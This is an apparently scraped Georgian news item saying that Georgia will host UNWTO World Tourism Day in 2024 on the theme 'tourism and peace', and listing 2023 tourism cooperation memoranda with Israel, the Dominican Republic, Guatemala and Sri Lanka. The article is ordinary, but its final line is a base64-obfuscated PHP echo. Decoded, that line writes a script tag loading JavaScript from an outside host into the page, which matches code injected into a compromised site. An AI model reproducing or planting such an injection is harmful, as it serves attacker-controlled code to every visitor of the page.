celsiusi
ავერსი საქკაბელი

გაერო-ს მსოფლიო ტურიზმის  ორგანიზაციის (UNWTO) გადაწყვეტილებით, 2024 წელს, საქართველო უმასპინძლებს მსოფლიო ტურიზმის დღეს.

ტურიზმის ადმინისტრაციის ცნობით, 2024 წელს დაგეგმილი ღონისძიების მთავარ თემატიკას წარმოადგენს „ტურიზმი და მშვიდობა“. მსოფლიო ტურიზმის დღისადმი მიძღვნილ მასშტაბურ ღონისძიებებზე დასასწრებად, რაც მოიცავს კულტურულ ღონისძიებების და თემატურს სადისკუსიო პანელების გამართვას და ასევე, ქვეყნის სხვადასხვა ტურისტული ადგილის მონახულებას, საქართველოს ეწვევიან UNWTO-ს გენერალური მდივანი, ორგანიზაციის წევრი ქვეყნების ტურიზმის მინისტრები და სხვა მაღალი რანგის სტუმრები.

წარმოდგენილი ღონისძიების საქართველოში გამართვა მნიშვნელოვნად შეუწყობს ხელს ქვეყნის როგორც გამორჩეული ტურისტული დანიშნულების ადგილის პოზიციონირებას მსოფლიოს მასშტაბით.

2023 წლის განმავლობაში, გაფორმდა ტურიზმის სფეროში ურთიერთთანამშრომლობის შეთანხმება და მემორანდუმები ისრაელის სახელმწიფოსთან, დომინიკის რესპუბლიკასთან, გვატემალასთან და შრი-ლანკასთან. თანამშრომლობის აღნიშნული ფორმატი წარმოადგენს პარტნიორი ქვეყნების საუკეთესო გამოცდილების გაზიარების, მათთან დარგის ფარგლებში ურთიერთობების  გაღრმავების და ვიზიტორთა ნაკადების შემდგომი ზრდის  შესანიშნავ საფუძველს.

403
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");